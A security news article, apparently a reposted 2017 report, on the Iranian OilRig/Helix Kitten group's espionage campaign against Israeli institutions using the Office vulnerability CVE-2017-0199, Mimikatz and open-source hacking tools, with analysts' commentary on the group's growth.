Iranian Hackers Believed Behind Massive Attacks on Israeli Targets

  /     /     /  
Publicated : 22/11/2024   Category : security


Iranian Hackers Believed Behind Massive Attacks on Israeli Targets


OilRig aka Helix Kitten nation-state group leveraged Microsoft zero-day bug in targeted attacks.



A massive targeted cyber espionage campaign against major Israeli institutions and government officials underscores just how far an Iranian nation-state hacking machine has come.
The Israeli Cyber Defense Authority yesterday announced that it believes Iran was behind the a series of targeted attacks against some 250 individuals between April 19 and 24 in government agencies, high-tech companies, medical organizations, and educational institutions including the renowned Ben-Gurion University. The attackers – whom security experts say are members of the so-called OilRig aka Helix Kitten aka NewsBeef nation-state hacking group in Iran -- used stolen email accounts from Ben-Gurion to send their payload to victims.
This is the largest and most sophisticated attack theyve [OilRig] ever performed, says Michael Gorelik, vice president of R&D for Morphisec, who studied the attacks and confirms that the final stage was thwarted for the most part. It was a major information-gathering [operation], he says.
OilRig has been rapidly maturing since it kicked off operations around 2015. The attack campaign against Israeli targets employed the just-patched Microsoft
CVE-2017-0199
 remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) application programming interface. This flaw had been weaponized in attacks prior to the patch, including Dridex banking Trojan and botnet attacks, and in at least one other cyber espionage campaign.
This technique by OilRig is a step up from the groups previous MO of using malicious macros to spread malware, where it employed Microsoft Excel and Word files that required the victim to enable macros to get infected with malware. But this time around, no macros were necessary: the files contained an exploit via an embedded link packed with an HTML executable, according to researchers at Israeli security firm Morphisec who studied the new attacks.
OilRig managed to catch the victims during the patching window between when Microsoft issues a security update and organizations actually roll out the patch, security experts say. The most important difference is that the use of macros was exchanged with a vulnerability exploit. With their ability to set up the attack in a relatively short time, the threat actors could correctly speculate that their window of opportunity between patch release and patch rollout was still open, according to Morphisecs
blog post
today.
The hacking group also was likely behind an attack campaign in January that employed a phony Juniper Networks VPN portal as well as phony websites purporting to be the University of Oxford, from which the attackers dropped malware.
Adam Meyers, vice president of intelligence at CrowdStrike, which has named this Iranian hacker group Helix Kitten, says the group has been advanced for some time. Theres this misconception that they werent sophisticated before, he says. This group has been active since 2015 and gone after aviation, energy, financial, and government targets in various regions and countries, including the United Arab Emirates, Turkey, and Qatar, he says.
OilRig/Helix Kitten was not the first attack group to weaponize the Microsoft
CVE-2017-0199
 remote code execution vulnerability before it was patched, he notes, pointing to attacks in Ukraine, China, and in the US earlier this year. Its unusual to see multiple threat actors pick up a zero-day, he says, which could hint that of an 0day broker selling it to multiple customers.
Meantime, Morphisecs Gorelik says in the latest round of attacks, OilRig employed a customized version of the open-source Mimikatz tool, which gives hackers access to user credentials in the Windows Local Security Authority Subsystem Service.
OilRig is among the ranks of
nation-state gangs using open-source hacking tools
. Kurt Baumgartner, principal security researcher for Kaspersky Labs Global Research and Analysis Team, says OilRig, which Kaspersky calls NewsBeef, in the past year has relied heavily on open-source hacking tools, namely  BeEF for exploiting holes in browsers; Unicorn for PowerShell-type attacks; and on Pupy, for planting a remote administration tool, or RAT. Thats a far cry from its earlier days, when it relied on social engineering accounts to target victims. NewsBeef is not well-resourced, so this enables them to up their game, he says.
Politics 
Most of Irans targets over the past few months have been in the Middle East – namely its nemesis Saudi Arabia – but this pivot to Israel should be a red flag to other nations embroiled in geopolitical conflict with Iran, such as the US, security experts say.
Tom Kellermann, CEO of Strategic Cyber Ventures, says the attacks indeed illustrate how Irans nation-state hacking machine has evolved and advanced. He attributes this transformation to Russian advisors assisting Iranian hackers. Look for OilRig to go West soon, too, he says.
Oilrig will tendril West to the USA due to the Secretary of State and Presidents visceral statements on Iran over that past month. The Iranians are not alone, as the Russian Pawn Storm [nation-state hacking] campaign will dramatically ratchet up due to tensions with US and NATO per the Baltics and the French election, he says.
Their attacks also may be more destructive, including data-wiping: To this point these actors will be more inclined to burn the evidence and house … [the] network via destructive counter-IR [incident response] integrity attacks, which could hamper IR efforts and investigations, he says. I am concerned that watering-hole attacks will increase, delivering 0days and wiper malware.
[Check out the two-day
Dark Reading Cybersecurity Crash Course
at Interop ITX, May 15 & 16, where Dark Reading editors and some of the industrys top cybersecurity experts will share the latest data security trends and best practices.]
Related Content:
Report: ‘OilRig Attacks Expanding Across Industries, Geographies
Mandiant: Financial Cybercriminals Looking More Like Nation-States
Iran Intensifies Its Cyberattack Activity
Shamoon Data-Wiping Malware Now Comes with Ransomware Option
The Coolest Hacks Of 2016
 

Last News

▸ Drawing lessons from auditor experiences. ◂
Discovered: 26/12/2024
Category: security

▸ Counterfeit Firefox Spyware Angers Mozilla. ◂
Discovered: 26/12/2024
Category: security

▸ FBI wants live wiretaps on Facebook, Google. ◂
Discovered: 26/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Iranian Hackers Believed Behind Massive Attacks on Israeli Targets